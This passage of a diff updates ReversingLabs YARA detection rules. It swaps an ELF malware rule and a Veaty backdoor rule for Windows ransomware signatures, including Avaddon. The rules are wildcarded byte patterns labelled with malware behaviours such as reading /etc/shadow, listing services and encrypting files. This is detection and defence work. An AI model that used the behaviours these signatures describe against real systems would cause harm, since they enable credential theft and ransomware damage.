-            D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
-        }
-		$read_etc_shadow_p1 = {
-            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89
-            95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
-            8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ??
-            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8D 3D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 55
-            ?? 41 B9 ?? ?? ?? ?? 41 89 D0 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8D
-            3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B
-            45 ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00
+		$search_processes = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D
+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53
+            FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF B5 ?? ?? ??
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5B 56 FF 15 ??
+            ?? ?? ?? 5E C9 C3
         }
-		$read_etc_shadow_p2 = {
-            3C ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00 3C ?? 0F 84 ?? ?? ?? ?? 48
-            8B 45 ?? 89 C2 48 8B 45 ?? 89 D1 29 C1 89 C8 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 8B 45 ?? 48 63 D0 48 8D 4D ?? 48 8B 5D ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89
-            C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48
-            63 D3 E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ??
-            ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 74 ?? 48 8B 45 ?? 48 83 C0 ?? 48
-            89 45 ?? 48 8B 85 ?? ?? ?? ?? 48 03 45 ?? 48 3B 45 ?? 0F 97 C0 84 C0 0F 85 ?? ?? ??
-            ?? EB ?? 90 EB ?? 90 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48
-            8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB
-            ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ??
-            89 D3 49 89 C4 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ??
-            ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3
-            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89
-            E0 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? E8 ?? ?? ??
+            ?? 8B F0 85 F6 74 ?? EB ?? 33 DB 39 5C 24 ?? 76 ?? 8D 7E ?? F6 47 ?? ?? 74 ?? 8D 47
+            ?? 50 E8 ?? ?? ?? ?? EB ?? FF 37 E8 ?? ?? ?? ?? 43 83 C7 ?? 59 3B 5C 24 ?? 72 ?? 8D
+            44 24 ?? 50 56 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ??
+            ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
         }
-		$list_running_services_p1 = {
-            55 48 89 E5 41 57 41 56 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89
-            B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 8D 55 ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49
-            89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 E9 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48
-            89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ??
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 94 C0 84 C0 74 ??
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57
+            8B 7D ?? 74 ?? 68 ?? ?? ?? ?? 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83
+            C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? 50 FF D6 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B CB E8 ?? ??
+            ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 83 C4 ?? 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B F0 89 74 24 ?? 83 FE ?? 74 ?? 57 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ??
+            ?? ?? FF D7 50 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 FF 35
+            ?? ?? ?? ?? FF D7 8B 7C 24 ?? 50 FF 35 ?? ?? ?? ?? 57 FF D6 57 FF 15 ?? ?? ?? ?? 8B
+            CB E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
         }
-		$list_running_services_p2 = {
-            8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 0F 85 ?? ?? ?? ??
-            BB ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 41 BE ?? ?? ?? ?? 48 8B 45 ?? 48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89
-            C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 48 8B 45 ??
-            48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 41 BD ?? ?? ??
-            ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? B8 ?? ?? ??
-            ?? EB ?? B8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 45 84 ED 75 ?? EB ?? 41 89 D7 48 89 85 ??
-            ?? ?? ?? 45 84 ED 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 49
-            63 D7 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 41 89 D5 49 89 C7 45 84 E4 74
-            ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 F8 49 63 D5 41 89 D4 49 89 C5 84 DB 74
-            ?? EB ?? 45 84 E4 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 4C 89 E8 49 63 D4 EB ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? EB ?? 89 D3 49 89 C4 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
-            E0 48 63 D3 EB ?? 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 8B 35 ?? ?? ?? ?? 57 FF 35 ?? ?? ?? ??
+            8B F9 89 7D ?? FF D6 FF 35 ?? ?? ?? ?? 8B D8 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF
+            D6 3B C3 0F 84 ?? ?? ?? ?? 6A ?? 59 33 DB 89 4D ?? 8B C3 88 9C 05 ?? ?? ?? ?? 40 3D
+            ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? 50 51 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 89 45 ?? 8A 84 0D ?? ?? ?? ?? 88 44 0D ??
+            41 83 F9 ?? 72 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 58 50 53 6A ?? 68 ?? ?? ?? ??
+            57 89 45 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 57 FF D6
+            8D 0C 47 83 E9 ?? 66 83 39 ?? 75 ?? FF 35 ?? ?? ?? ?? 2B CF 83 C1 ?? D1 F9 8D 04 4F
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF 35 ?? ?? ?? ?? FF D6 FF 75 ?? 8B F0 FF
+            15 ?? ?? ?? ?? 3B C6 75 ?? 33 F6 46 EB ?? 8B 75 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
+            8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 33 F6 46 85 F6 74 ?? 8B 35
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
         }
-		$list_running_services_p3 = {
-            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ??
-            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89 F8 48 81 C4 ?? ?? ?? ??
-            5B 41 5C 41 5D 41 5E 41 5F C9 C3
+		$encrypt_files_p2 = {
+            53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF
+            75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 81 7D ?? ?? ?? ?? ?? 74 ?? E9 ?? ?? ?? ?? 6A ??
+            6A ?? 51 0F 57 C0 50 66 0F 13 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 2D ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 DA ?? 89 45 ?? 8B 45 ?? 2D ?? ?? ?? ?? 89 55 ?? 89 45
+            ?? 8D 45 ?? 83 D9 ?? 89 45 ?? 89 4D ?? 6A ?? 6A ?? FF 70 ?? FF 30 53 FF D7 6A ?? 8D
+            45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? 8D
+            55 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 99 6A
+            ?? 6A ?? 52 50 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8B
+            45 ?? 83 C0 ?? 83 6D ?? ?? 89 45 ?? 75 ?? 8B 7D ?? 0F 57 C0 6A ?? 6A ?? 66 0F 13 45
+            ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A
+            ?? 8D 45 ?? 50 53 FF D6 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF
+            D6 53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ??
+            ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 57 FF 15 ?? ??
+            ?? ?? 8B CE E8 ?? ?? ?? ?? 5F 5E 5B C9 C3
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $kill_and_restart_daemons_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $read_etc_shadow_p* ) ) and ( all of ( $list_running_services_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_processes ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Veaty : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Veaty backdoor."
+		description = "Yara rule that detects Avaddon ransomware."
 		author = "ReversingLabs"
-		id = "da03c6a4-388e-59b2-b94f-63da2c15e464"
-		date = "2025-10-13"
-		modified = "2025-10-13"
+		id = "f3a57482-5799-594b-bcfa-1137ca04dfd5"
+		date = "2020-10-19"
+		modified = "2020-10-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.Veaty.yara#L1-L84"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "77e5ffee617b5d4e4b28d99b25dd6ea2f89551a702c6a25a2db3edbf941d034d"
+		logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Veaty"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Avaddon"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$fetch_commands = {
-            73 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0D 02 03 04 05 0E ?? 28 ?? ?? ??
-            ?? 0C 72 ?? ?? ?? ?? 13 ?? 08 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
-            ?? 13 ?? 0E ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 11
-            ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 0E ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C
-            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 16 6F ?? ?? ?? ?? 06 11 ?? 6F ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
-            ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 2D ?? 09 72 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 72 ?? ??
-            ?? ?? 06 6F ?? ?? ?? ?? 09 13 ?? DD ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 07
-            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? DE ?? 13 ?? 72 ??
-            ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 13 ?? 72 ?? ?? ?? ?? 11 ?? 25 2D ?? 26 14 2B ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A
-            09 2A 11
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F
+            ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ??
+            59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33
+            C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F
+            B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ??
+            ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ??
+            ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA
+            42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF
+            15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39
+            8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
